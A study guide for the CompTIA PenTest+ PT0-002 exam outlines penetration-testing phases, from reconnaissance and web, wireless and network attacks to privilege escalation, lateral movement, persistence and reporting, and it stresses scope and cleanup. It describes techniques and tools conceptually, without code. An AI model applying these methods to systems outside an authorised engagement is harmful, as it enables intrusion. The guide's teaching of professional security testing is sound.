CompTIA PenTest+ PT0-002 Attacks Exploits and Reporting

To become a competent penetration tester, you must master more than just finding vulnerabilities; you must ethically exploit them to demonstrate real risk and communicate findings effectively. The CompTIA PenTest+ PT0-002 exam validates this critical lifecycle, testing your ability to move from initial access to detailed reporting.

Reconnaissance and Initial Attack Vectors

Before any exploit can be launched, thorough reconnaissance sets the stage. This phase involves passive information gathering (collecting data from public sources without interacting with the target) and active reconnaissance (directly probing the target system to map networks and discover live hosts). For the exam, you must understand tools like Nmap for port scanning and the difference between TCP SYN scans (-sS) and full TCP connect scans (-sT).

The initial compromise often comes from one of several key vectors. Network-based attacks target services and protocols. This includes exploiting vulnerabilities in services like SMB (e.g., EternalBlue) or using techniques like ARP poisoning to intercept traffic in a man-in-the-middle (MiTM) attack. You should be able to explain how an attacker uses a tool like Metasploit to exploit a known vulnerability on an open port.

Social engineering techniques manipulate human psychology to gain access or information. This encompasses phishing (deceptive emails), vishing (voice calls), and pretexting (creating a fabricated scenario). For the PenTest+, you need to know how these techniques are used in engagements, such as crafting a phishing campaign to steal credentials, which is often a simpler path than technical exploitation.

Web, Wireless, and Specialized System Exploitation

Web application exploits are a major focus due to their prevalence. You must understand injection attacks, notably SQL injection (SQLi), where malicious SQL code is inserted into an input field to manipulate a backend database. Similarly, cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. The exam will test your knowledge of identifying and exploiting these flaws, potentially using a tool like SQLmap for automated SQLi detection and exploitation.

Wireless attacks target the protocols and configurations of Wi-Fi networks. A common attack is against the WPA2 handshake using a tool like Aircrack-ng to capture and crack the pre-shared key. You also need to understand evil twin attacks, where a malicious access point is set up with a legitimate-sounding name to trick users into connecting, enabling credential harvesting. For the exam, know the steps: monitor mode, packet capture, deauthentication, and then cracking.

Modern environments require knowledge of cloud-based attacks and mobile device exploitation. Cloud attacks might focus on misconfigured storage buckets (like public S3 buckets), weak Identity and Access Management (IAM) policies, or exploiting serverless functions. Mobile exploitation could involve analyzing insecure mobile applications (APK files) for hardcoded credentials or insecure data storage. The PenTest+ expects you to adapt traditional attack methods to these newer architectures.

Post-Exploitation: Maintaining Access and Moving Laterally

Gaining an initial shell is just the beginning. Post-exploitation activities are about deepening access and understanding the value of the compromised system. The first major goal is privilege escalation. This can be vertical (moving from a user account to an administrator or root account) or horizontal (moving to another user with similar privileges). You need to know common methods like exploiting kernel vulnerabilities (e.g., using uname -a to find the kernel version) or abusing misconfigured file permissions (e.g., sudo rights or SUID binaries).

Once elevated, lateral movement is the process of pivoting from the initially compromised host to other systems on the network. Techniques include pass-the-hash (using a hashed password instead of the plaintext password to authenticate) and using stolen credentials with tools like PsExec. The key for the exam is understanding the tools and protocols used for lateral movement, such as SMB, RDP, and WinRM, and how to use meterpreter sessions to pivot through a network.

To ensure you can return, you must establish persistence. This involves mechanisms that survive reboots and user logoffs. Examples include creating scheduled tasks (cron jobs on Linux, Task Scheduler on Windows), installing backdoor services, or adding registry run keys. A test question might ask you to identify the most stealthy persistence mechanism in a given scenario, weighing detectability against reliability.

Analysis, Tools, and Professional Reporting

Throughout the engagement, you will use a suite of penetration testing tools. The exam doesn't require command memorization but expects you to know the purpose and typical use case for tools in categories like vulnerability scanners (Nessus, OpenVAS), exploitation frameworks (Metasploit), proxy tools (Burp Suite, OWASP ZAP), and credential cracking tools (John the Ripper, Hashcat). You must be able to analyze tool output to determine the next logical step in an attack chain.

The ultimate deliverable is the penetration test report. This is where your technical work translates into business value. A professional report includes an executive summary for leadership, a detailed technical findings section, and prioritized remediation recommendations. Each finding should clearly link a vulnerability (e.g., "Unpatched Apache Struts instance") to the exploit used, the impact (e.g., "Remote Code Execution"), and a concrete remedial action (e.g., "Apply patch version X.Y.Z"). For the exam, understand how to score findings using standardized systems like the Common Vulnerability Scoring System (CVSS) to communicate severity objectively.

Common Pitfalls

1. Focusing Only on Exploitation: A common mistake is rushing to exploit without proper reconnaissance or documentation. On the exam and in real work, failing to scope the engagement properly or document your steps can lead to missed vulnerabilities or an invalidated test. Always follow a structured methodology.
2. Ignoring the Cleanup Phase: After the test, you must remove all persistence mechanisms, shells, and tools deployed. Neglecting this post-engagement cleanup can leave the client's systems in a more vulnerable state than when you started, which is unethical and unprofessional. Exam scenarios may test your knowledge of this crucial phase.
3. Writing Vague Reports: Reporting "system is vulnerable" without proof, clear impact, or actionable steps is a critical failure. The exam will expect specific, evidence-based findings. Your recommendations must be practical and prioritized, not just a list of CVEs. A finding without a clear remediation path is of little use to the client.
4. Misunderstanding Scope and Rules of Engagement: Attempting attacks on systems not listed in the scope (like attacking a client's cloud production environment when only the test environment was authorized) is a serious ethical and legal breach. Exam questions often include scenarios where you must identify the correct action based on the defined Rules of Engagement (RoE).

Summary

• A successful penetration test follows a structured flow: reconnaissance, scanning, exploitation, post-exploitation, and reporting.
• You must be proficient across multiple attack vectors, including network services, web applications, wireless systems, and human elements via social engineering.
• Post-exploitation is critical and involves privilege escalation, lateral movement, and establishing persistence to fully assess the security posture of an environment.
• The use of appropriate tools is essential, but your ability to analyze their output and pivot your strategy is what demonstrates skill.
• The final report is your primary deliverable; it must translate technical findings into business risk with clear, actionable remediation recommendations for the client.
• Always operate strictly within the agreed-upon scope and Rules of Engagement, and ensure you clean up all artifacts after the test concludes.